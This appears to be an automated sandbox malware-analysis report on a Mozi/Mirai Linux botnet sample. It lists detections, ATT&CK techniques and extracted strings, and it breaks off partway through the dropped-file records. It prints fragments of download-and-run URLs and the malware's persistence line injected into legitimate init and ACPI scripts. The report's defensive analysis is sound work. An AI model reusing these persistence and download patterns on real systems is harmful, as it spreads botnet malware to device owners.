              Source: kvm-test-1-run.sh.66.drBinary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
              Source: kvm-test-1-run.sh.66.drBinary or memory string: kill -KILL $qemu_pid
              Source: functions.sh0.66.drBinary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
              Source: kvm-test-1-run.sh.66.drBinary or memory string: echo Monitoring qemu job at pid $qemu_pid
              Source: functions.sh0.66.drBinary or memory string: qemu-system-ppc64)
              Source: kvm-test-1-run.sh.66.drBinary or memory string: qemu_pid=$!
              Source: kvm-test-1-run.sh.66.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
              Source: kvm.sh.66.drBinary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
              Source: kvm-recheck-lock.sh.66.drBinary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
              Source: functions.sh0.66.drBinary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
              Source: kvm-test-1-run.sh.66.drBinary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
              Source: kvm-test-1-run.sh.66.drBinary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
              Source: kvm.sh.66.drBinary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
              Source: functions.sh0.66.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
              Source: functions.sh0.66.drBinary or memory string: identify_qemu_append () {
              Source: kvm-test-1-run.sh.66.drBinary or memory string: echo Grace period for qemu job at pid $qemu_pid
              Source: kvm-test-1-run.sh.66.drBinary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
              Source: functions.sh0.66.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
              Source: kvm.sh.66.drBinary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
              Source: functions.sh0.66.drBinary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm-test-1-run.sh.66.dr; Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.66.dr; Binary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
Source: functions.sh0.66.dr; Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: kvm-test-1-run.sh.66.dr; Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
Source: functions.sh0.66.dr; Binary or memory string: identify_qemu_args () {
Source: kvm-test-1-run.sh.66.dr; Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: functions.sh0.66.dr; Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.66.dr; Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.66.dr; Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh0.66.dr; Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.66.dr; Binary or memory string: --qemu-args|--qemu-arg)
Source: kvm.sh.66.dr; Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: functions.sh0.66.dr; Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: functions.sh0.66.dr; Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.66.dr; Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm-test-1-run.sh.66.dr; Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
Source: kvm.sh.66.dr; Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.66.dr; Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh0.66.dr; Binary or memory string: specify_qemu_cpus () {
Source: functions.sh0.66.dr; Binary or memory string: echo qemu-system-ppc64
Source: functions.sh0.66.dr; Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: kvm.sh.66.dr; Binary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
Source: functions.sh0.66.dr; Binary or memory string: qemu-system-ppc64)
Source: functions.sh0.66.dr; Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.66.dr; Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm-recheck-rcu.sh.66.dr; Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh0.66.dr; Binary or memory string: # identify_qemu_append qemu-cmd
Source: kvm-test-1-run.sh.66.dr; Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.66.dr; Binary or memory string: identify_qemu_vcpus () {
Source: functions.sh0.66.dr; Binary or memory string: # qemu-args already contains "-smp".
Source: functions.sh0.66.dr; Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh0.66.dr; Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: functions.sh0.66.dr; Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh0.66.dr; Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.66.dr; Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh0.66.dr; Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh0.66.dr; Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: kvm.sh.66.dr; Binary or memory string: --qemu-cmd)
Source: functions.sh0.66.dr; Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm-test-1-run.sh.66.dr; Binary or memory string: qemu_args=$5
Source: kvm.sh.66.dr; Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.66.dr; Binary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: kvm-test-1-run.sh.66.dr; Binary or memory string: # Generate qemu -append arguments
Source: kvm-test-1-run.sh.66.dr; Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
Source: functions.sh0.66.dr; Binary or memory string: # identify_qemu builddir
Source: kvm-test-1-run.sh.66.dr; Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh0.66.dr; Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: functions.sh0.66.dr; Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.66.dr; Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh0.66.dr; Binary or memory string: echo qemu-system-i386
Source: functions.sh0.66.dr; Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: functions.sh0.66.dr; Binary or memory string: echo qemu-system-x86_64
Source: functions.sh0.66.dr; Binary or memory string: identify_qemu () {

              Mitre Att&ck Matrix

Techniques per tactic (a number in parentheses is the count shown next to that technique in the matrix):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Command and Scripting Interpreter (1); Scripting (12); At (Linux) (1); At (Windows); Cron
Persistence: .bash_profile and .bashrc (1); At (Linux) (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script
Privilege Escalation: .bash_profile and .bashrc (1); At (Linux) (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script
Defense Evasion: Masquerading (1); File and Directory Permissions Modification (1); Scripting (12); Hidden Files and Directories (1); File Deletion (1)
Credential Access: OS Credential Dumping (1); Brute Force (1); Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery (11); Remote System Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits
Command and Control: Data Obfuscation; Junk Data; Steganography; Protocol Impersonation; Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings
Impact: Modify System Partition; Device Lockout; Delete Device Data

              Behavior Graph

Behavior Graph ID: 294799; Sample: Mozi.m; Startdate: 07/10/2020; Architecture: LINUX; Score: 100

[Graph image not reproduced. Content recoverable from the graph text: Mozi.m is started via "dash sleep Mozi.m" and re-spawns itself; the child Mozi.m drops /usr/sbin/alsa-info.sh (ASCII), /usr/networks (ELF), /usr/bin/gettext.sh (ASCII) and 21 other malicious files, and starts sh children that run killall and iptables (one iptables child loads modprobe). Signatures attached to these nodes: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Sample tries to persist itself using /etc/profile; Drops files in suspicious directories; Sample reads /proc/mounts (often used for finding a writable filesystem); Sample tries to persist itself using System V runlevels; Opens /proc/net/* files useful for finding connected devices and routers; Terminates several processes with shell command 'killall'; Executes the "iptables" command to insert, remove and/or manipulate rules. Separate process branches for logrotate (gzip), resolvconf (mkdir, sed) and "sh date" also appear in the graph.]

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

Source | Detection | Scanner | Label
Mozi.m | 70% | Virustotal |
Mozi.m | 62% | ReversingLabs | Linux.Trojan.Mirai
Mozi.m | 100% | Avira | LINUX/Mirai.lldau

              Dropped Files

Source | Detection | Scanner | Label
/usr/networks | 100% | Avira | LINUX/Mirai.lldau
/usr/networks | 62% | ReversingLabs | Linux.Trojan.Mirai

              Domains

              No Antivirus matches

              URLs

Source | Detection | Scanner | Label
http://pastebin.ca) | 0% | Avira URL Cloud | safe
http://%s:%d/bin.sh;chmod | 0% | Avira URL Cloud | safe
http://%s:%d/Mozi.a;chmod | 0% | Avira URL Cloud | safe
http://%s:%d/Mozi.m;$ | 0% | Avira URL Cloud | safe
http://127.0.0.1 | 0% | Avira URL Cloud | safe
http://www.alsa-project.org | 0% | Avira URL Cloud | safe
http://%s:%d/Mozi.m | 0% | Avira URL Cloud | safe
http://www.alsa-project.org/cardinfo-db/ | 0% | Avira URL Cloud | safe
http://127.0.0.1sendcmd | 0% | Avira URL Cloud | safe
http://%s:%d/Mozi.m;/tmp/Mozi.m | 0% | Avira URL Cloud | safe
http://%s:%d/bin.sh | 0% | Avira URL Cloud | safe
http://purenetworks.com/HNAP1/ | 0% | Avira URL Cloud | safe
http://www.alsa-project.org/alsa-info.sh | 0% | Avira URL Cloud | safe
http://%s:%d/Mozi.m; | 0% | Avira URL Cloud | safe
http://www.alsa-project.org. | 0% | Avira URL Cloud | safe
http://HTTP/1.1 | 0% | Avira URL Cloud | safe
http://%s:%d/Mozi.a;sh$ | 0% | Avira URL Cloud | safe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://pastebin.ca) | alsa-info.sh0.66.dr | false | Avira URL Cloud: safe | low
http://%s:%d/bin.sh;chmod | Mozi.m | true | Avira URL Cloud: safe | low
http://%s:%d/Mozi.a;chmod | Mozi.m | false | Avira URL Cloud: safe | low
http://schemas.xmlsoap.org/soap/encoding/ | Mozi.m | false | | high
http://%s:%d/Mozi.m;$ | Mozi.m | true | Avira URL Cloud: safe | low
http://schemas.xmlsoap.org/soap/envelope/ | Mozi.m | false | | high
http://127.0.0.1 | Mozi.m | false | Avira URL Cloud: safe | unknown
http://baidu.com/%s/%s/%d/%s/%s/%s/%s) | Mozi.m | false | | high
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/ | .config.66.dr | false | | high
http://www.alsa-project.org | alsa-info.sh0.66.dr | false | Avira URL Cloud: safe | unknown
http://www.pastebin.ca/upload.php | alsa-info.sh0.66.dr | false | | high
http://%s:%d/Mozi.m | Mozi.m | true | Avira URL Cloud: safe | low
http://www.alsa-project.org/cardinfo-db/ | alsa-info.sh0.66.dr | false | Avira URL Cloud: safe | unknown
http://127.0.0.1sendcmd | Mozi.m | false | Avira URL Cloud: safe | low
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY | alsa-info.sh0.66.dr | false | | high
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah | alsa-info.sh0.66.dr | false | | high
http://ipinfo.io/ip | Mozi.m | false | | high
http://%s:%d/Mozi.m;/tmp/Mozi.m | Mozi.m | true | Avira URL Cloud: safe | low
http://%s:%d/bin.sh | Mozi.m | true | Avira URL Cloud: safe | low
http://www.pastebin.ca | alsa-info.sh0.66.dr | false | | high
http://purenetworks.com/HNAP1/ | Mozi.m | false | Avira URL Cloud: safe | unknown
http://www.alsa-project.org/alsa-info.sh | alsa-info.sh0.66.dr | false | Avira URL Cloud: safe | unknown
http://%s:%d/Mozi.m; | Mozi.m | true | Avira URL Cloud: safe | low
http://www.alsa-project.org. | alsa-info.sh0.66.dr | false | Avira URL Cloud: safe | unknown
http://HTTP/1.1 | Mozi.m | false | Avira URL Cloud: safe | low
http://%s:%d/Mozi.a;sh$ | Mozi.m | false | Avira URL Cloud: safe | low
http://www.pastebin.ca. | alsa-info.sh0.66.dr | false | | high
http://schemas.xmlsoap.org/soap/envelope// | Mozi.m | false | | high

                                    Contacted IPs

                                    No contacted IP infos

                                    General Information

                                    Joe Sandbox Version:30.0.0 Red Diamond
                                    Analysis ID:294799
                                    Start date:07.10.2020
                                    Start time:23:40:11
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 6m 53s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:Mozi.m
                                    Cookbook file name:defaultlinuxfilecookbook.jbs
                                    Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
                                    Detection:MAL
                                    Classification:mal100.spre.troj.evad.linM@0/230@0/0
                                    Warnings:
                                    • VT rate limit hit for: http://pastebin.ca)


                                    Runtime Messages

                                    Command:/tmp/Mozi.m
                                    Exit Code:0
                                    Exit Code Info:
                                    Killed:False
                                    Standard Output:

                                    Standard Error:telnetd: no process found
                                    utelnetd: no process found
                                    scfgmgr: no process found
                                    Unsupported ioctl: cmd=0xffffffff80045705
                                    Unsupported ioctl: cmd=0xffffffff80045705
                                    Unsupported ioctl: cmd=0xffffffff80045705
                                    /bin/sh: 1: cfgtool: not found
                                    /bin/sh: 1: cfgtool: not found
                                    Unsupported ioctl: cmd=0xffffffff80045705
                                    qemu: uncaught target signal 11 (Segmentation fault) - core dumped
                                    Unsupported ioctl: cmd=0xffffffff80045705

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASN

                                    No context

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

Match | Associated Sample Name / URL | Detection
/etc/init.d/S95baby.sh | 1skm346Xtz | malicious
/etc/init.d/S95baby.sh | Mozi.a | malicious
/etc/init.d/S95baby.sh | Mozi.1.m | malicious
/etc/init.d/S95baby.sh | 6wuvHEBHt8.bin | malicious
/etc/init.d/S95baby.sh | 7v1ic5IS8I | malicious
/etc/init.d/S95baby.sh | Mozi.a | malicious
/etc/init.d/S95baby.sh | Mozi.a | malicious
/etc/init.d/S95baby.sh | Mozi.m | malicious
/etc/init.d/S95baby.sh | Mozi.m | malicious
/etc/init.d/S95baby.sh | Mozi.m | malicious
/etc/init.d/S95baby.sh | bad_file | malicious
/etc/init.d/S95baby.sh | mxjzQQFgLp | malicious
/etc/init.d/S95baby.sh | JrAL1wW1MQ | malicious
/etc/rcS.d/S95baby.sh | 1skm346Xtz | malicious
/etc/rcS.d/S95baby.sh | Mozi.a | malicious
/etc/rcS.d/S95baby.sh | Mozi.1.m | malicious
/etc/rcS.d/S95baby.sh | 6wuvHEBHt8.bin | malicious
/etc/rcS.d/S95baby.sh | 7v1ic5IS8I | malicious
/etc/rcS.d/S95baby.sh | Mozi.a | malicious
/etc/rcS.d/S95baby.sh | Mozi.a | malicious
/etc/rcS.d/S95baby.sh | Mozi.m | malicious
/etc/rcS.d/S95baby.sh | Mozi.m | malicious
/etc/rcS.d/S95baby.sh | Mozi.m | malicious
/etc/rcS.d/S95baby.sh | bad_file | malicious
/etc/rcS.d/S95baby.sh | mxjzQQFgLp | malicious
/etc/rcS.d/S95baby.sh | JrAL1wW1MQ | malicious

                                                                                        Created / dropped Files

                                                                                        /boot/grub/i386-pc/modinfo.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):23
                                                                                        Entropy (8bit):3.882045108136863
                                                                                        Encrypted:false
                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                        /etc/acpi/asus-keyboard-backlight.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):326
                                                                                        Entropy (8bit):5.2904323771702915
                                                                                        Encrypted:false
                                                                                        MD5:626FDB50CA17F4E2BAAB79F09F3EB73B
                                                                                        SHA1:2D838897E7D735CB67348F60EDA0E1E41D45DCBE
                                                                                        SHA-256:3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
                                                                                        SHA-512:E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview: ./usr/networks&.test -d $KEYS_DIR || exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.
                                                                                        /etc/acpi/asus-wireless.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):157
                                                                                        Entropy (8bit):4.412729940630044
                                                                                        Encrypted:false
                                                                                        MD5:9B10038ADE21F207C6C9F4EEC7C5ADA2
                                                                                        SHA1:F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
                                                                                        SHA-256:E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
                                                                                        SHA-512:C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.
                                                                                        /etc/acpi/ibm-wireless.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):636
                                                                                        Entropy (8bit):4.722087767454589
                                                                                        Encrypted:false
                                                                                        MD5:77315C7FA7809C62D27AD6C9EE1C9289
                                                                                        SHA1:C8EC67C17E334B13B1DE93B0D2E822C606F9985E
                                                                                        SHA-256:81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
                                                                                        SHA-512:B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.
                                                                                        /etc/acpi/powerbtn.sh
                                                                                        Process:/tmp/Mozi.m
                                                                                        File Type:ASCII text
                                                                                        Size (bytes):2079
                                                                                        Entropy (8bit):4.778187000249208
                                                                                        Encrypted:false
                                                                                        MD5:CF725BE1199B06F062A47095420F7DC5
                                                                                        SHA1:98F1BC7C1B81C708B326BB3DC1C33AA3F29D8BBE
                                                                                        SHA-256:C617FF036646CF1EEF3AC91EC504093CC25C93E07850276AA37AA2542A724B01
                                                                                        SHA-512:D2F9649FED4B309108F2C67F28B1EE66C30219AF9B36F30E85F190064B3D5A65963BF6B9D3A8662A2197B47DFECA95D52447D7FCA4CDBAA69BB722BE5417DC50
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview: ./usr/networks&. exit 0.fi..# getXuser gets the X user belonging to the display in $displaynum..# If you want the foreground X user, use getXconsole!.getXuser() {. user=`pinky -fw | awk '{ if ($2 == ":'$displaynum'" || $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user | cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-s
/etc/acpi/tosh-wireless.sh
Process:/tmp/Mozi.m
File Type:ASCII text
Size (bytes):483
Entropy (8bit):4.215331622973397
Encrypted:false
MD5:07889D65619CDB80F8E876A087F160D3
SHA1:35CB92B632BCA335EBEA933A736F75856E8CA262
SHA-256:34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
SHA-512:C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
Malicious:false
Reputation:moderate, very likely benign file
Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth | grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.
/etc/acpi/undock.sh
Process:/tmp/Mozi.m
File Type:ASCII text
Size (bytes):266
Entropy (8bit):4.77497394042067
Encrypted:false
MD5:5E3A15E41D35EC409613236A20B5783E
SHA1:5D71BD9A121461464F7937B2E921410ED93BEE24
SHA-256:C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
SHA-512:13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
Malicious:false
Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] || continue..[ x$(cat "$device/type") = xdock_station ] || continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.
/etc/bash_completion.d/libreoffice.sh
Process:/tmp/Mozi.m
File Type:ASCII text
Size (bytes):23
Entropy (8bit):3.882045108136863
Encrypted:false
MD5:D7BC14787BBF05DEAC1113F4B42B6099
SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:false
Preview: ./usr/networks&.exit 1.
/etc/init.d/S95baby.sh
Process:/tmp/Mozi.m
File Type:POSIX shell script, ASCII text executable
Size (bytes):25
Entropy (8bit):3.8936606896881854
Encrypted:false
MD5:1B3235BA10FC04836C941D3D27301956
SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
Malicious:true
Joe Sandbox View:
• Filename: 1skm346Xtz, Detection: malicious
• Filename: Mozi.a, Detection: malicious
• Filename: Mozi.1.m, Detection: malicious
• Filename: 6wuvHEBHt8.bin, Detection: malicious
• Filename: 7v1ic5IS8I, Detection: malicious
• Filename: Mozi.a, Detection: malicious
• Filename: Mozi.a, Detection: malicious
• Filename: Mozi.m, Detection: malicious
• Filename: Mozi.m, Detection: malicious
• Filename: Mozi.m, Detection: malicious
• Filename: bad_file, Detection: malicious
• Filename: mxjzQQFgLp, Detection: malicious
• Filename: JrAL1wW1MQ, Detection: malicious
Preview: #!/bin/sh./usr/networks&.
/etc/init.d/bootmisc.sh
Process:/tmp/Mozi.m
File Type:ASCII text
Size (bytes):148
Entropy (8bit):4.718194263525147
Encrypted:false
MD5:68EC1ED64500D143FE44D1ED0B19DD83
SHA1:90AE6027194C555ED6DE71191682E1773DD8E609
SHA-256:F450F84C27D8339C63251AEB3DC06634AC42E8F4B0AFDA734E1044B5453ECF0D
SHA-512:C9CD195893143DE17D2029672DA2236C7EC44498B1B5F13526CCA56665388790A198ECD0F2FE097FB8D035F780AFFCC5F984DDE1D0540AA778892F52E7698EBB
Malicious:true
Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: bootmisc.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
/etc/init.d/checkfs.sh
Process:/tmp/Mozi.m
File Type:ASCII text
Size (bytes):147
Entropy (8bit):4.7173471450646
Encrypted:false
MD5:FC904BF1583E7C4398FCCDF2D3276902
SHA1:25D51112D0A6C9C977F4BB0B73BB3B4F278074A3
SHA-256:059F2548AB66249C86CC868222E9CA0B44123E23A99D4D3581044D1306730BD7
SHA-512:DF7FC2EE581E67BC3282F05FB8DC33FCAF86B29F564E5CB43965AFDB6AE7422D06A6091A18375B3544F495CA827B6CC6B213FF4FFE7AEC252C326B8D56B4CF84
Malicious:true
Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
/etc/init.d/checkroot-bootclean.sh
Process:/tmp/Mozi.m
File Type:ASCII text
Size (bytes):250
Entropy (8bit):4.872318043360431
Encrypted:false
MD5:1B20C93FFEABBAA880FEB038394DA3EE
SHA1:CDD8FDC804AE4D7464E3B67B26F52C53C5EEAD13
SHA-256:3A63188036AB39E080E5035091441EFB91BF22F20C9292900929CA8F04D0F280
SHA-512:E2717119C05473DEB21FF60060813C6B4648FB6B94B524D76A15ED9506ED2BCFFA03108ABAB7CBF52A29D7507937749D0F9F420A96D4F75B499553434F836059
Malicious:true
Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkroot-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
/etc/init.d/checkroot.sh
Process:/tmp/Mozi.m
File Type:ASCII text
Size (bytes):3111
Entropy (8bit):4.922960717312443
Encrypted:false
MD5:544D026D22E17EF8C1F59AE6EC1E5993
SHA1:F5BFEE80CBF31DAEC25CD0728F030580F539D88F
